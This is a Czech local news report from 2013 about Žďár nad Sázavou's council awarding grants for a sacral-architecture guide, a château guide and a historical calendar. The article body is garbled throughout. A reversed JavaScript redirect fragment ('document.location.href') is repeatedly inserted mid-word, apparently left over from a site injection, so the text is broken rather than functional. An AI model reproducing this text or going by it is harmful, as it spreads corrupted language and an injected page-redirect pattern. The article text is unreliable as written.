Žďár nad Sázavou, zdar nad sazavou, aktuality, grant, kultura
Rainbow page separator

Grant podpoří i průvodce sakrální architekturou

Čtvrtek, 28. března 2013

Žďár nad Sázavou / Gran[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tový program na podporu ediční činnosti vázané na kulturu, his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torii a přírodu s názvem Ediční činnost 2013 vyhodnotili žďárští radní. Tři úspěšní žadatelé o peníze města si rozdělí finance ve výši šedesát tisíc korun.

Gran[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tový program na podporu ediční činnosti žďárská radnice vyhlašuje jednou za dva roky, celkový objem posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaných peněz činil s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tisíc korun. Z celkem sedmi žádostí byly schváleny tři.

Dvaadvacet tisíc korun bylo přislíbeno římskoka[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolické farnosti ve žďárském zámku, která je použije na vydání stručného průvodce žďárskou sakrální architekturou. Publikace vyjde v nákladu šesti tisíc kusů.

Třicet tisíc korun z grantu města získá Informační a turistické centrum Zámek Žďár na stručného průvodce areálem zámku, expozicemi i památkou UNESCO. Náklad bude dvacet tisíc kusů.

Třetím příjemcem financí z grantu je Jan Havlík ze společnosti Grafies 3 plus, který vydá his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torický kalendář Žďáru v nákladu 3100 kusů – prodejní cena kalendáře bude činit šedesát korun za kus.